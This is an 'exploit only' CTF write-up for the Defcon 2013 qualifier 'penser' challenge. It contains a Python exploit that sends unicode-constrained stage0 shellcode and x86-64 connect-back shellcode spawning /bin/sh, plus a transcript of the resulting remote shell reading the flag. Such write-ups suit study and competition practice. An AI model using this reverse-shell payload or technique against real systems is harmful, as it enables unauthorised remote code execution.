Category : Pwnable (\xff\xe4\xcc)
penserSummary : unicode shellcode, overwrite below byte
Exploit
#!/usr/bin/python from socket import * from struct import pack import time HOST = "penser.shallweplayaga.me" PORT = 8273 """ 51 # push %rcx 00 45 00 # align 59 # pop %rcx 00 45 00 52 # push %rdx 00 45 00 58 # pop %rax 00 45 00 32 00 # xor (%rax), %al 50 # push %rax 00 45 00 5a # pop %rdx 00 45 00 59 # pop %rcx 00 45 00 59 # pop %rcx 00 45 00 59 # pop %rcx 00 45 00 59 # pop %rcx 00 0a # add %cl,(%rdx) 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 45 00 58 # pop %rax 00 45 00 50 # push %rax 00 4b 00 #### will be replaced """ stage0 = "\x51\x45\x59\x45\x52\x45\x58\x45\x32\x50\x45\x5a\x45\x59\x45\x59\x45\x59\x45\x59\x0a\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x45\x58\x45\x50\x4b\x00\x00" shellcode = "\x90"*0x100 +\ "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97" +\ "\x48\xb9\x02\x00\x7a\x69\x00\x00\x00\x00\x51\x48\x89\xe6" +\ "\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce" +\ "\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f" +\ "\x62\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48" +\ "\x89\xe6\x0f\x05" s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) s.send("\xc3\x02\x00\x00") time.sleep(0.5) s.send(stage0+shellcode) time.sleep(0.5) s.close() |
root@ubuntu:~# ./exploit.py -------------------------------------------------------------- root@ubuntu:~# nc -lv 31337 Connection from 54.226.204.186 port 31337 [tcp/*] accepted id uid=1001(penser) gid=1001(penser) groups=1001(penser) cat key The key is: TBDHelloooookdkdkiekdiekdiek |
'CTF > 2013' 카테고리의 다른 글
| Secuinside CTF 2013 Qual - 6. givemeshell (Exploit only) (0) | 2013.07.23 |
|---|---|
| Defcon CTF 2013 Qual chal exploits (0) | 2013.07.07 |
| Defcon CTF 2013 Qual - shellcode3 (Exploit only) (0) | 2013.07.07 |
| Defcon CTF 2013 Qual - shellcode2 (Exploit only) (0) | 2013.07.07 |
| Defcon CTF 2013 Qual - pwnable3 (Exploit only) (0) | 2013.07.07 |
